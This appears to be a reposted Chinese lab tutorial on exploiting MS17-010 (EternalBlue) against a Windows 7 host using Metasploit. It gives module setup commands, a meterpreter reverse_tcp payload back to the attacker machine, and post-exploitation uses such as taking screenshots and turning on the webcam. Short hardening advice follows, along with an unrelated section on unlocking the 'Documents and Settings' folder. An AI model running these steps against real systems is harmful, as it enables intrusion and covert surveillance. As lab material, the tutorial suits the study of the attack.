靶机:windows7 x64 IP:192.168.1.5
攻击机:Kali Rolling (2019.3) x64 IP:192.168.1.3
两台主机在同一网段内;win7关闭防火墙并且开启445端口。
1、使用ipconfig/ifconfig分别查看win7和kali的ip。
2、打开msf工具
每次开启都会有不同的界面
3、使用search命令搜索ms17_010
4、选择模块和设置条件
使用use来选择第三个模块,可以直接 use 2,也可以打全
然后用set来设置靶机IP set rhost 192.168.1.5
设置本机IP set lhost 192.168.1.3
设置监听端口 set lport 8888 不设置则默认4444端口
设置payload set payload windows/x64/meterpreter/reverse_tcp
还有另外一个payload能用于本实验,具体可以 show payloads 查看
最后,可以使用show options检查所有信息
5、开始渗透 run
稍等片刻 看到win则成功创建会话
6、成功之后,可以开启Windows7的摄像头,截图等等
具体可以用help查看
1、关闭445端口
2、打开防火墙,安装安全软件
3、安装对应补丁,这里就不放链接了
关闭445端口的方法:
1)打开控制面板----Windows防火墙----高级设置
2)点击新建规则,设置端口号的规则并且命名(如图)
msf工具虽然强大,但只能用于已知的并且已提交模块的漏洞。要理解漏洞原理,理解如何使用漏洞,甚至自己挖洞才能做到真正的去攻击。而不是简单的使用工具use和set。
1、打开C盘的根目录默认是没有Documents and Settings系统文件夹的,因为系统文件夹默认都是隐藏的。我们先选择【组织】菜单——文件夹和搜索选项。
2、选择【查看】:去掉【隐藏受保护的 *** 作系统文件】前的勾,确定。
3、此时可以看到Documents and Settings系统文件夹前是一个锁标记,这里因为我已经将Documents and Settings系统文件夹的保护权限取消掉了,所以锁标记就没了。
4、选择Documents and Settings系统文件夹,右键选择【属性】。选择【安全】选项卡:点击【高级】
5、默认有一个拒绝类型的特殊权限选项,选中拒绝类型的特殊权限选项,点击【更改权限】。
d出窗口后,选择拒绝类型的特殊权限选项删除。这里因为我已经删除了,所以看不到。
6、回到最前面的窗口,点击【编辑】,勾选【完全控制】。默认允许下是没有任何权限,确定后就可以双击Documents and Settings系统文件夹访问了,此时可以看到Documents and Settings系统文件夹可以正常访问。
欢迎分享,转载请注明来源:内存溢出
评论列表(0条)